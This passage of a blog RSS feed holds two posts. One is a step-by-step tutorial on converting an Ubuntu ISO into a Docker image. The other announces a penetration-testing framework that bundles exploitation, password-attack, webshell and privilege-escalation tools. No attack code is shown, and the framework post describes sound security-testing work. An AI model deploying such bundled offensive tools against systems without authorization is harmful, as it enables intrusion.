&lt;strong&gt;&lt;em&gt;unsquashfs :&lt;/em&gt;&lt;/strong&gt; a tool to &lt;a href="https://en.wikipedia.org/wiki/Data_compression" rel="noopener noreferrer"&gt;uncompress&lt;/a&gt; squashfs &lt;a href="https://en.wikipedia.org/wiki/File_system" rel="noopener noreferrer"&gt;file systems&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Requirments :
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;em&gt;squashfs-tools :&lt;/em&gt;&lt;/strong&gt; install &lt;a href="https://www.tldp.org/HOWTO/html_single/SquashFS-HOWTO/" rel="noopener noreferrer"&gt;squashfs-tools&lt;/a&gt; in your system&lt;/li&gt;
&lt;li&gt;Downlading the LiveCD ISO version&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F689%2F1%2A5iKRJRqEauoShmFeUK0CEg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F689%2F1%2A5iKRJRqEauoShmFeUK0CEg.png"&gt;&lt;/a&gt;ISO file downloaded &amp;amp; squashfs-tools installed&lt;/p&gt;

&lt;h3&gt;
  
  
  Let’s start ! :
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;1- Start by creating the 2 folders (rootfs and unsquashfs)&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$: mkdir rootfs unquashfs


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F689%2F1%2ANURaMl8Ci4YwdiiQtStmOw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F689%2F1%2ANURaMl8Ci4YwdiiQtStmOw.png"&gt;&lt;/a&gt;Creating rootfs &amp;amp; unsquashfs folders&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;2- mount your ISO file to the rootfs folder as a loop device&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$: sudo mount -o loop ubuntu-18.04.3-desktop-amd64.iso rootfs


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F738%2F1%2ATsYCriGIdOADKWutnvevNA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F738%2F1%2ATsYCriGIdOADKWutnvevNA.png"&gt;&lt;/a&gt;Mounting the ISO file&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;3- Find the filesystem.squashfs file&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$: find . -type f | grep filesystem.squashfs


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F737%2F1%2A-E1VJCkjliKF50-yftzmhg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F737%2F1%2A-E1VJCkjliKF50-yftzmhg.png"&gt;&lt;/a&gt;Finding the filesystem.squashfs file&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;4- use unsquashfs to extract filesystem files to the unsquashfs folder (that would take between 5–10mins)&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$: sudo unsquashfs -f -d unsquashfs/ rootfs/casper/filesystem.squashfs


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F739%2F1%2A1VvqdeBDYCkPLqe5IhQ4HA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F739%2F1%2A1VvqdeBDYCkPLqe5IhQ4HA.png"&gt;&lt;/a&gt;Extractingthe filesystem files to the unsquashfs folder&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;5- compress and import the image using docker (that would take some time 10–20 mins)&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$: sudo tar -C unsquashfs -c . | docker import - sofiane/myimg


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;6- you will get a sha256 hash (somthing like this )&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$:sha256:qf917d58831f926c6b93ff84bd6az68550a6cd6c36aeb6c837c53d655d9453sh


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F683%2F1%2AQi0hAgYD_Z1ZbpQdYKcAcA.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F683%2F1%2AQi0hAgYD_Z1ZbpQdYKcAcA.jpeg"&gt;&lt;/a&gt;&lt;strong&gt;&lt;em&gt;Compressing then importing the image using docker&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;7- test your docker image :&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$:docker run -h ubuntu -i -t sofiane/myimg bash


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F965%2F1%2AZRWqyHmN1z8ivdzJLKr7zA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F965%2F1%2AZRWqyHmN1z8ivdzJLKr7zA.png"&gt;&lt;/a&gt;Docker images&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F683%2F1%2Axe0m7QiM-0c-XBl3oizNtw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F683%2F1%2Axe0m7QiM-0c-XBl3oizNtw.png"&gt;&lt;/a&gt;Your docker image is READY!&lt;/p&gt;

&lt;p&gt;And here you go !&lt;/p&gt;

&lt;p&gt;Thank you for reading,&lt;/p&gt;

&lt;h4&gt;
  
  
  My Twitter :
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://twitter.com/S0fianeHamlaoui" rel="noopener noreferrer"&gt;Sofiane Hamlaoui&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;My Github :&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/SofianeHamlaoui" rel="noopener noreferrer"&gt;SofianeHamlaoui - Overview&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Support me :
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Paypal : &lt;a href="http://paypal.me/SofianeHamlaoui" rel="noopener noreferrer"&gt;paypal.me/SofianeHamlaoui&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;BTC : 1NR2oqsuevvWJwzCyhBXmqEA5eYAaSoJFk&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>sofianehamlaoui</category>
      <category>dockerimage</category>
      <category>converting</category>
      <category>iso</category>
    </item>
    <item>
      <title>Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources (Sofiane…</title>
      <dc:creator>Sofiane Hamlaoui</dc:creator>
      <pubDate>Tue, 17 Sep 2019 01:28:54 +0000</pubDate>
      <link>https://dev.to/sofianehamlaoui/lockdoor-framework-a-penetration-testing-framework-with-cyber-security-resources-sofiane-b63</link>
      <guid>https://dev.to/sofianehamlaoui/lockdoor-framework-a-penetration-testing-framework-with-cyber-security-resources-sofiane-b63</guid>
      <description>&lt;h3&gt;
  
  
  🔐 Lockdoor Framework : A Penetration Testing framework with Cyber Security Resources (Sofiane Hamlaoui)
&lt;/h3&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Lockdoor&lt;/strong&gt;  ?
&lt;/h3&gt;

&lt;p&gt;Lockdoor, First let’s start by explaining this (kind-of) weird name. Well After days of thinking, I asked my best friend (Rafik) to suggest me a name of a tool on Cyber Security, IT field and all of that! First thing came to his mind was LOCKDOOOR ! I was like … euuuh Oookey let’s roll !&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;The Idea ?&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Well before Lockdoor, I had A shell scripts that downloads all the tools I need from Github, The Public ones from other Github repositories and the Private ones from mine. With that I was customizing, Adding and removing tools and so on.&lt;/p&gt;

&lt;p&gt;One day (07/09/2019) I’ve said, Why not making a framework and share it with others, so I can Learn, share and maybe discover new tools that I didn’t even know about! It was at this right moment exactly ! Lockdoor was born :’).&lt;/p&gt;

&lt;h3&gt;
  
  
  Lockdoor Framework ?
&lt;/h3&gt;

&lt;p&gt;*Lockdoor* is a Framework aimed at helping penetration testers, bug bounty hunters And cyber security engineers.&lt;br&gt;&lt;br&gt;
This tool is designed for Debian/Ubuntu/ArchLinux based distributions to create a similar and familiar distribution for Penetration Testing. But containing the favorite and the most used tools by Pentesters.&lt;br&gt;&lt;br&gt;
As pentesters, most of us has his personal ‘ /pentest/ ‘ directory so this Framework is helping you to build a perfect one.&lt;/p&gt;
&lt;h3&gt;
  
  
  A NEW tool ?
&lt;/h3&gt;

&lt;p&gt;Yeah, We all know that there a lot of frameworks and similar tools like lockdoor, So my added value ( what made lockdoor different ) was Adding The Favorite and most used tools by pentesters, Automating the Pentesting process to help you do the job more quickly and the best part ! CHEATSHEETS &amp;amp; RESOURCES!&lt;/p&gt;

&lt;p&gt;So yes, that’s what made lockdoor a Different New tool.&lt;/p&gt;
&lt;h3&gt;
  
  
  Okey ?
&lt;/h3&gt;

&lt;p&gt;The Test Video of the 1.0Beta Version (On Youtube) :&lt;/p&gt;

&lt;p&gt;&lt;iframe width="710" height="399" src="https://www.youtube.com/embed/_agvb29FQrs"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;h3&gt;
  
  
  Screenshots :
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--PJoaF4R5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/878/1%2A8BwpxJtcrjjbWO_eueirxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--PJoaF4R5--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/878/1%2A8BwpxJtcrjjbWO_eueirxg.png" alt=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--xMNglKya--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/878/1%2Azt7TuVMM-QUSIuI_yV77ig.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--xMNglKya--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/878/1%2Azt7TuVMM-QUSIuI_yV77ig.png" alt=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--gTDl_p2Z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/877/1%2Arh8RgHEhGuciOWeWJQzzVA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--gTDl_p2Z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/877/1%2Arh8RgHEhGuciOWeWJQzzVA.png" alt=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--xNyg6V4p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/877/1%2AnkdnyLxmVmQtMSxLSWtFEw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--xNyg6V4p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://cdn-images-1.medium.com/max/877/1%2AnkdnyLxmVmQtMSxLSWtFEw.png" alt=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What Tools ?
&lt;/h3&gt;

&lt;p&gt;The Version 1.0Beta has :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Information Gathring Tools (21)&lt;/li&gt;
&lt;li&gt;Web Hacking Tools(15)&lt;/li&gt;
&lt;li&gt;Reverse Engineering Tools (15)&lt;/li&gt;
&lt;li&gt;Exploitation Tools (6)&lt;/li&gt;
&lt;li&gt;Pentesting &amp;amp; Security Assessment Findings Report Templates (6)&lt;/li&gt;
&lt;li&gt;Password Attack Tools (4)&lt;/li&gt;
&lt;li&gt;Shell Tools + Blackarch’s Webshells Collection (4)&lt;/li&gt;
&lt;li&gt;Walk Throughs &amp;amp; Pentest Processing Helpers (3)&lt;/li&gt;
&lt;li&gt;Encryption/Decryption Tools (2)&lt;/li&gt;
&lt;li&gt;Social Engineering tools (1)&lt;/li&gt;
&lt;li&gt;All you need as Privilege Escalation scripts and exploits&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  What’s Next ?
&lt;/h3&gt;

&lt;p&gt;Well ! Adding more tools, resources, cheat sheets to make the life of Penetesters easier ❤&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;More : Check Lockdoor Framework Github Repo on Github with the most detailed readme file on this planet ( I’m not sure about that ! just saying )&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://github.com/SofianeHamlaoui/Lockdoor-Framework"&gt;SofianeHamlaoui/Lockdoor-Framework&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;My twitter account :&lt;/p&gt;

&lt;p&gt;&lt;a href="https://twitter.com/S0fianeHamlaoui"&gt;Sofiane Hamlaoui&lt;/a&gt;&lt;/p&gt;

</description>
      <category>hackingtools</category>
      <category>sofianehamlaoui</category>
      <category>redteamtools</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
